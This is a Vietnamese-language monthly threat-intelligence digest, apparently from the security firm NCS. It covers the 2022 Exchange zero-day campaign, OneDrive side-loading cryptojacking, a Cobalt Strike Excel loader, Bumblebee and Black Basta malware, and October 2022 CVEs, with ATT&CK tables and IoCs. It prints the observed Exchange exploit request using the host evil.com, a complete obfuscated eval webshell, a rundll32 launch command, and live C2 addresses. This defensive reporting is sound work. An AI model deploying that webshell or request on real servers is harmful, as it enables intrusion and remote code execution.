Hàng tháng, Chúng tôi – NCS tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Chiến Dịch Tấn Công Sử Dụng Lỗ Hổng Zero Day Trên Microsoft Exchange Server
Ngày 28/09, Nhóm nghiên cứu của NCS đã cảnh báo về một chiến dịch tấn công mới sử dụng lỗ hổng Zero-Day trên Microsoft Exchage Server. Khoảng từ đầu tháng 08/2022, đội ngũ giám sát an ninh mạng và xử lý sự cố của NCS SOC đã phát hiện một số tổ chức tại Việt Nam bị tấn công an ninh mạng bắt nguồn từ hệ thống Microsoft Exchange Server.
Kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. Dựa trên log IIS, các request exploit có định dạng giống như lỗ hổng ProxyShell:
autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com.
Đội ngũ Redteam của NCS đã tiến hành nghiên cứu và tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.
Trên máy chủ Exchange phát hiện các webshell được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).
<%@Page Language=”Jscript”%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>
NCS nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).
Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange.
Microsoft đã định danh cho 2 lỗ hổng 0-day này lần lượt là CVE-2022-41040 (SSRF) và CVE-2022-41082 (RCE). Đồng thời, Microsoft cung cấp các biện pháp giảm thiểu đối với lỗ hổng này. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Resource Development | T1586.002 | Compromise Accounts: Email Accounts |
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
Execution | T1047 | Windows Management Instrumentation |
Persistence | T1505.003 | Server Software Component: Web Shell |
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
Defense Evasion | T1620 | Reflective Code Loading |
Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory |
Discovery | T1087 | Account Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1049 | System Network Connections Discovery |
Lateral Movement | T1570 | Lateral Tool Transfer |
Collection | T1560.001 | Archive Collected Data: Archive via Utility |
Indicators of Compromise (IoCs)
Files / hash SHA 256
c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82
45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9
9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0
29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3
c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
C2 Domain
125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11
1.2 Phát Hiện Chiến Dịch Cryptojacking Sử Dụng Side-Loading Onedrive
Ngày 05/10, nhóm nghiên cứu của Bitdefender đã thông báo về một chiến dịch tấn công tiền điện tử (Cryptojacking) mà kẻ tấn công đã khai thác lỗ hổng DLL Side-Loading trên ứng dụng OneDrive của Microsoft.
Trong khoảng thời gian từ ngày 1 tháng 5 đến ngày 1 tháng 7 năm 2022, Bitdefender đã phát hiện ra các cuộc tấn công tiền điện tử vào khoảng 700 người dùng trên toàn cầu. Kẻ tấn công đã viết một tệp secur32.dll giả mạo vào thư mục “%LocalAppData%\Microsoft\OneDrive\” và được tải bởi một trong các tiến trình OneDrive (OneDrive.exe hoặc OneDriveStandaloneUpdater.exe).
Mặc định, tệp OneDriveStandaloneUpdater.exe được lập lịch chạy hàng ngày, tệp OneDrive.exe được chạy mỗi khi reboot. Điều này giúp cho kẻ tấn công đạt được khả năng duy trì xâm nhập (persistence) bên trong hệ thống của nạn nhân.
Đội ngũ Bitdefender xác nhận bước đầu xâm nhập của kẻ tấn công thông qua phần mềm độc hại được ngụy trang dưới dạng phần mềm hợp pháp (adobe photoshop setup.exe, Free_Macro_V1.3.exe, AppLaunch.exe). Tệp secur32.dll giả mạo sẽ thực hiện tải xuống một phần mềm mã nguồn mở khai thác tiền điện tử và inject nó vào các tiến trình hợp pháp của Windows.
Kẻ tấn công đã sử dụng hai kỹ thuật để tránh bị phát hiện: DLL Side-Loading và Process Hollowing. Đầu tiên là tệp secur32.dll được tải bởi tiến trình của OneDrive thông qua lỗ hổng DLL Side-Loading. Thứ hai là phần mềm khai thác tiền điện tử được chạy bên trong tiến trình svchost.exe hoặc conhost.exe bằng kỹ thuật Process Hollowing. Ngoài ra, phần mềm độc hại cũng che giấu các strings, imports API khiến cho việc phát hiện trở nên khó khăn hơn.
Hình 2.1 Luồng tấn công
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Execution | T1204.002 | User Execution: Malicious File |
Execution | T1106 | Native API |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
Defense Evasion | T1055.012 | Process Injection: Process Hollowing |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System InformationDiscovery |
Discovery | T1614 | System Location Discovery |
Command and Control | T1071.001 | Web Protocols |
Impact | T1496 | Resource Hijacking |
Indicators of Compromise (IoCs)
Files / hash MD5
fed6517a5f84eecc29edee5586d7feeb
9b0d09fd16c24a1691fa7e316351399d
9b1c1fd2556275a985bb4ce4aba99975
ec36e1abbf75584a9d0bb4a15f8f2c33
f3af73070387fb75b19286826cc3126c
7de8b8015540bf923385c36f60b9d5ae
656a4c1fcc572e855ac2e512c04ae206
7bbeb20cfcabcfa69d668c24a235082e
7c64bb78b589054079a1048f9fc79708
73cef9a93e9572c148a5785434708c41
7c64bb78b589054079a1048f9fc79708
1.3 Cobalt Strike Loader Được Phát Tán Thông Qua Tệp Excel Có Chủ Đề Về Quân Sự Ukraina
Ngày 11/10, nhóm nghiên cứu của FortiGuard đã quan sát thấy ngày càng nhiều chiến dịch nhắm vào một trong hai bên của cuộc xung đột Nga-Ukraine đang diễn ra. FortiGuard đã bắt gặp một tài liệu Excel độc hại giả mạo làm công cụ tính lương cho quân nhân Ukraine.
Cuộc tấn công bắt đầu với một tệp Excel được tải với mã macro độc hại (XLSM). Tệp này giả dạng như một công cụ bảng tính để tạo tiền lương cho quân nhân Ukraine. Như thường lệ, tài liệu cố gắng lừa người dùng cho phép thực thi các macro.
Điều đầu tiên cần chú ý khi mở mã VBA là khoảng trắng lớn trước phần bắt đầu của mã, khiến nó thoạt nhìn có vẻ trống rỗng. Cuộn xuống cho thấy hàm độc hại SUMMPROPIS2, được thực thi tự động khi tệp được mở thông qua hàm Workbook_Open () . Ngoài ra, tài liệu cố gắng thực thi chức năng này bằng cách tham chiếu nó từ một số ô, các ô này cũng được kích hoạt khi tệp được mở. Điều này dẫn đến phần mềm độc hại được thực thi nhiều lần sau khi mở.
Mã VBA sử dụng các kỹ thuật xáo trộn đơn giản, bao gồm các hàm và tên biến không thể đọc được để làm chậm quá trình phân tích tĩnh. Ngoài ra, dữ liệu quan trọng được mã hóa dưới dạng chuỗi hex, bao gồm cả tệp nhị phân độc hại được nhúng.
Hình 3.1 Luồng tấn công
Mã VBA thực hiện các chức năng chính sau:
- Giải mã nhị phân độc hại từ một chuỗi thập lục phân và lưu nó vào %AppData%\Microsoft\fhasbqwn.dll
- Tạo shortcut (.LNK) với tên %Temp%\jdbsabdqbsmnqwdssad.lnk. Mục tiêu của tệp .LNK là thực thi chức năng đã xuất DllUnregisterServer của DLL độc hại, thường được sử dụng để hủy đăng ký DLL khỏi hệ thống. Tuy nhiên, trường hợp này dẫn đến việc thực thi các chức năng độc hại của DLL (Hình 3.2).
Hình 3.2 Tệp shortcut dẫn đến việc thực thi DLL độc hại
- Chạy shortcut qua
RunDLL32.EXE shell32.dll, ShellExec_RunDLL %Temp%\jdbsabdqbsmnqwdssad.lnk
Nhiệm vụ cuối cùng của quá trình lây nhiễm là tải và thực thi Cobalt Strike Beacon, một công cụ phổ biến duy trì xâm nhập trước khi triển khai phần mềm độc hại khác trong hệ thống của nạn nhân.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Execution | T1204.002 | User Execution: Malicious File |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic |
Execution | T1106 | Native API |
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Defense Evasion | T1218.010 | System Binary Proxy Execution: Regsvr32 |
Defense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32 |
Defense Evasion | T1036.004 | Masquerading: Masquerade Task or Service |
Defense Evasion | T1055.003 | Process Injection: Thread Execution Hijacking |
Discovery | T1057 | Process Discovery |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1071.001 | Web Protocols |
Indicators of Compromise (IoCs)
Files / hash SHA256
4cedec3e1a2f72a917ad9a59ebe116ed50c3268567946d1e493c8163486b888b
c0c455cd3e18be14d2e34cf4e3fb98e7ab0a75ef04b6049ff9f7b306d62704b8
2927794d7c550c07303199752b8226f197d7ef497d04cf038859f95b60edc9ce
b03c9f7823810e3eeef3c0b1d6c00da4f16fdc2ced92f97f78e5676d0989d9b3
de8c789ef2e1da81182a7529e7b42adf2984cd6e70b02e60fd770ebe658086ae
C2 Domain
hxxps://ellechina[.]online/01_logo_HLW-300×168[.]jpg
hxxps://pedaily[.]link/daashbooard/managgemment/GCLwJmax/KFKcpjlf
hxxps://pedaily[.]link/daashbooard/managgemment/oknz05PqOlqLtMGB/tzJGhpVp
2 Malware
2.1 Phân Tích Bumblebee Loader
Bumblebee Loader thông thường là các DLL được đóng gói trong các file định dạng ISO hoặc VHD. Mã độc sẽ kiểm tra môi trường đang chạy để tránh việc thực thi trong môi trường sandbox, các đoạn code trong mã độc được sử dụng từ công cụ mã nguồn mở al-khaser. Sau khi kiểm tra, mã độc tiến hành load cấu hình vào trong bộ nhớ bằng cách trỏ tới phân vùng .data. Nơi lữu trữ khóa RC4(80 bytes đầu tiên) và các dữ liệu sẽ được giải mã bằng khóa RC4 trên. Bumblebee thu thập thông tin bao gồm tên máy và GUUID, nối thành một chuỗi sau đó sử dụng MD5 để tính toán, giá trị này sẽ gắn với client_id. Giá trị client_id cùng một số thông tin khác thu thập từ máy nạn nhân sẽ được Bumblebee xây dựng thành C&C check-in dưới định dạng JSON như sau:
Chuỗi này sẽ được mã hóa bằng thuật toán RC4 với khóa được sử dụng ở cấu hình bên trên và gửi tới C2 server. Các thông tin phản hồi từ phía C2 server cũng được mã bằng cùng một khóa RC4. Dữ liệu từ C2 trả về có thể là null
hoặc payload mới được encode base64 trong trường task_data
Một trong những hoạt động đáng lưu ý khác là Bumblebee sẽ drop các payload phụ thuộc vào tùy từng nạn nhân. Nếu nạn nhân nằm trong WORKGROUP, trong hầu hết các trường hợp, mã độc sẽ sử dụng DEX command (Download and Execute), drop payload mới xuống máy nạn nhân và thực thi. Các payload này thường là các stealer phổ biến như Vidar Stealer hay banking Trojan
Nếu nạn nhân nằm trong domain, DIJ command (Download and Inject) hoặc SHI command (Shellcode and Inject) sẽ được sử dụng. Trong trường hợp này các payload mới thường có thể là CobaltStrike, Sliver hoặc Metepreter.
Indicators of Compromise (IoCs)
Bumblebee samples
c70413851599bbcd9df3ce34cc356b66d10a5cbb2da97b488c1b68894c60ea69
14f04302df7fa49d138c876705303d6991083fd84c59e8a618d6933d50905c61
76e4742d9e7f4fd3a74a98c006dfdce23c2f9434e48809d62772acff169c3549
024f8b16ee749c7bb0d76500ab22aa1418cd8256fb12dcbf18ab248acf45947e
2691858396d4993749fec76ac34cf3cc3658ee3d4eaf9c748e2782cfc994849d
6bc2ab410376c1587717b2293f2f3ce47cb341f4c527a729da28ce00adaaa8db
083a4678c635f5d14ac5b6d15675d2b39f947bb9253be34d0ab0db18d3140f96
21df56d1d4b0a6a54bae3aba7fe15d307bac0e3391625cef9b05dd749cf78c0c
31005979dc726ed1ebfe05558f00c841912ca950dccdcdf73fd2ffbae1f2b97f
2d67a6e6e7f95d3649d4740419f596981a149b500503cbc3fcbeb11684e55218
3c0f67f71e427b24dc77b3dee60b08bfb19012634465115e1a2e7ee5bef16015
ca9da17b4b24bb5b24cc4274cc7040525092dffdaa5922f4a381e5e21ebf33aa
82aab01a3776e83695437f63dacda88a7e382af65af4af1306b5dbddbf34f9eb
a5bcb48c0d29fbe956236107b074e66ffc61900bc5abfb127087bb1f4928615c
07f277c527d707c6138aae2742939e8edc9f700e68c4f50fd3d17fe799641ea8
68ac44d1a9d77c25a97d2c443435459d757136f0d447bfe79027f7ef23a89fce
13c573cad2740d61e676440657b09033a5bec1e96aa1f404eed62ba819858d78
7024ec02c9670d02462764dcf99b9a66b29907eae5462edb7ae974fe2efeebad
ee27cceac88199bf3546e8b187d77509519d6782a0e114fc9cfc11faa2d33cd1
b2c28cdc4468f65e6fe2f5ef3691fa682057ed51c4347ad6b9672a9e19b5565e
Bumblebee C2 servers
104.168.201.219
142.11.234.230
145.239.30.26
145.239.135.155
145.239.28.110
146.19.173.202
146.70.125.122
152.89.247.79
185.17.40.189
185.62.58.175
205.185.122.143
205.185.123.137
209.141.46.50
209.141.58.141
51.210.158.156
51.68.144.94
51.68.145.54
51.68.146.186
51.68.147.233
51.75.62.99
51.83.250.240
51.83.251.245
51.83.253.131
51.83.253.244
54.37.130.166
54.37.131.14
54.38.136.111
54.38.136.187
54.38.138.94
54.38.139.20
Nguồn tham khảo: https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/
2.2 Phân Tích Black Basta Ransomware
Thông qua hình thức phishing như gửi email đính kèm mã độc hay URL độc hại, ransomware sẽ được phát tán tới máy nạn nhân.
Black Basta dropper giả mạo ứng dụng tạo USB boot với đầy đủ chữ ký hợp pháp từ trang web Rufus. Black Basta sử dụng nhiều kỹ thuật lẩn tránh và anti-debug khác nhau như System Flag, CPU registers Timing checks, Libraty checks, Windows API checks, nếu có phát hiện bất kỳ debugger hay môi trường giả lập sandbox nào, dropper sẽ ngừng thực thi Black Basta.
Sau các bước kiểm tra, Black Basta payload sẽ được thực thi, với việc ban đầu là tạo mutex có tên “dsajdhas.0”. Đặt hình nền và gán biểu tượng cho file với phần mở rộng là .basta. Các hình ảnh này được mã độc giải nén ở thư mục TEMP. Mã độc cũng thực hiện xóa các file shadow volume trên máy nạn nhân.
Mã độc sử dụng thuật toán ChaCha20 (được cho là nhanh hơn so với AES) cho quá trình mã hóa với khóa được tạo là ngẫu nhiên cho mỗi file. Sau đó sử dụng tiếp thuật toán RSA, khóa sẽ được nối vào cuối mỗi tệp đã được mã hóa. Mã độc chỉ mã hóa khối thứ 3 với kích thước mỗi khối là 64 bytes mà không mã hóa hết toàn bộ file.
Sau quá trình mã hóa, ransomware sẽ tạo file ransom note có tên “readme.txt” tại Desktop. Giá trị company ID được hardcoded trong binary cho thấy dấu hiệu của một cuộc tấn công có chủ đích
Black Basta cũng có tích năng phát tán mã độc tới các máy khác trong mạng thông qua LDAP API. Sau khi có được danh sách các máy client trong mạng, ransomware sẽ sao chép chính nó tới các máy thông qua đường dẫn \\ c $ \\ Windows \\ tmp.exe. Sử dụng COM object objectIWbemClassObject (CLSID: 4590F812-1D3A-11D0-891F-00AA004B2E24) và WbemServices->Win32_Process, để thực thi ransomware.
Indicators of Compromise (IoCs)
07fdfcde9c9a3f60b1302c6a42ef1191fcfa861e94638968c8023ed957d9144f
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa
7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e
b1773d41cb87d61073f7bb1fc3aca877f01fd64f7b1430666ce3c9bb65ecae70
bc1baf6014affceab4e59a781c33df25f2e9baa17c0cc579f6a6702d0db585d2
e354bf321585aef56829913384ff890deb5836ce1299fb27d7d34b4dab37b937
Nguồn tham khảo: https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – October 2022
Trong tháng 10, Microsoft đã phát hành các bản vá cho 85 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure, Azure Arc và Azure DevOps; Microsoft Edge (Chromium-based); Office và Office Components; Visual Studio Code; Active Directory Domain Services và Active Directory Certificate Services; Nu Get Client; Hyper-V và the Windows Resilient File System (ReFS). Trong đó có 15 lỗ hổng được đánh giá mức độ Nghiêm trọng, 69 lỗ hổng được đánh giá là Improtant
Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:
3.1.1 CVE-2022-41033 – Windows COM+ Event System Service Elevation of Privilege Vulnerability
CVSS v3: 7.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, thực thi các đoạn mã độc hại bằng quyền SYSTEM. Micrsoft ghi nhận lỗ hổng đang được khai thác bởi các nhóm tấn công.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033
3.1.2 CVE-2022-37976 – Active Directory Certificate Services Elevation of Privilege Vulnerability
CVSS v3: 8.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, ảnh hưởng đến máy chủ Active Directory có cài đặt ADCS (Active Directory Certificates Service).
Phiên bản ảnh hưởng:
Windows Server 2016
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976
3.1.3 CVE-2022-41038 – Microsoft SharePoint Server Remote Code Execution Vulnerability
CVSS v3: 8.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ trên hệ thống bị ảnh hưởng, khai thác lỗ hổng yêu cầu xác thực với quyền sử dụng Manage Lists trong SharePoint.
Phiên bản ảnh hưởng:
Microsoft SharePoint Foundation 2013 Service Pack 1
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2013 Service Pack 1
Microsoft SharePoint Enterprise Server 2016
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2022-42889 – Arbitrary Code Execution in Apache Commons Text
CVSS v3: 9.8/10
Mô tả: Tồn tại lỗ hổng trong class StringSubstitutor thuộc thư viện Apache Commons Text, lỗ hổng cho phép kẻ tấn công thực thi mã từ xa. Hiện tại mã khai thác đã public trên Internet.
Phiên bản ảnh hưởng:
Apache Commons Text phiên bản từ 1.5 đến 1.9
Khuyến nghị: Cài đặt cập nhật bản vá lên phiên bản 1.10 theo hướng dẫn của hãng:
https://commons.apache.org/proper/commons-text/download_text.cgi
3.2.2 CVE-2022-41352 – Zimbra Collaboration Suite TAR Path Traversal
CVSS v3: 9.8/10
Mô tả: Lỗ hổng tồn tại trong một thành phần của Zimbra suite có tên Amavis. Bằng cách gửi email đính kèm với tệp tin độc hại được nén dưới định dạng Tar, khi nhận email Amavis trong Zimbra sẽ xử lý và gọi đến tính năng cpio nhằm trích xuất tệp tin nén. Dẫn đến có thể thực thi mã từ xa.
Khuyến nghị: Cài đặt bản cập nhật theo hướng dẫn của hãng: https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27. Trong trường hợp không thể cập nhật, cài đặt pax trên máy chủ cấu hình Zimbra
3.2.3 CVE-2022-40684 – Fortinet Authentication Bypass Vulnerability
CVSS v3: 9.6/10
Mô tả: Lỗ hổng cho phép kẻ tấn công bỏ qua xác thực truy cập vào hệ thống bị ảnh hưởng .
Phiên bản ảnh hưởng:
FortiOS phiên bản 7.2.0 đến 7.2.1; FortiOS phiên bản 7.0.0 đến 7.0.6;
FortiProxy phiên bản 7.2.0; FortiProxy phiên bản 7.0.0 đến 7.0.6
FortiSwitchManager phiên bản 7.0.0 và 7.2.0
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.fortiguard.com/psirt/FG-IR-22-377